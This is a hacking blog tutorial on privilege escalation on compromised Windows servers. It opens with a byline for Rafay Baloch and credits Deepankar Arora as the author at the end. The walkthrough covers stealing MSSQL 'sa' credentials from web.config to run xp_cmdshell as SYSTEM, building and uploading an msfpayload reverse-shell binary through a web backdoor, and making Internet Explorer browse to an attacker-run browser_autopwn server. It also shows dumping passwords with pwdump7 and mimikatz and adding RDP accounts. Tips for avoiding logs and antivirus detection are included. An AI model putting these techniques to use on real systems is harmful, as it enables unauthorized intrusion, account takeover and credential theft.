Hi, I am Rafay Baloch, a security researcher, author and a public speaker.

Windows Servers Privilege Escalation Attacks

Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.

But, these get the job done only on Linux servers. What about windows servers?

Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
  • Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure.
  • Using meterpreter payload to get a reverse shell over the target machine.
  • Using browser_autopwn. (Really...)
  • Using other tools like pwdump7, mimikatz, etc.

Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.

1. Using xp_cmdshell-

Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing login credentials of "sa" account.

Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can login remotely using HeidiSQL
HeidiSQL is an awesome tool to connect to remote database servers. You can download it here.

After logging into MSSQL server with sa account, we get a list of databases and their contents.

Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)

Syntax for the query is-
xp_cmdshell '[command]'

For example, if I need to know my current privileges, I would query-
xp_cmdshell 'whoami'

This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.

Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
2. Meterpreter Payload-

This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.
Using metasploit, generate a reverse shell payload binary.

For example-
msfpayload windows/shell_reverse_tcp LHOST= LPORT=31337 X > /tmp/1.exe

Now we will upload this executable to the server using our web backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
Now it's time to execute the payload.
If everything goes right, we will get a meterpreter session over the target machine as shown below-
We can also use php, asp or other payloads.

3. Browser Autopwn-
This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.
Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.
I think it is clear by now that what I'm trying to explain ;)
We can start Internet Explorer from command line and make it browse to a specific URL.

Syntax for  this-
iexplore.exe [URL]

Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

4. Using readily available tools-
Tools like pwdump and mimikatz can crack passwords of windows users.

#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper.
The following screenshot shows NTLM hashes from pwdump7:

#mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it.
Following picture shows plain text passwords from mimikatz:

You can google about them and learn how to use these tools and what actually they exploit to get the job done for you.

I hope you can now exploit every another windows server.
Happy Hacking :)

About The Author

This article has been written by Deepankar Arora, He is an independent security researcher from India, He has been listed in various hall of fames. 
© 2023 All Rights Reserved by RHA Info Sec. Top

Contact Form


Email *

Message *

Powered by Blogger.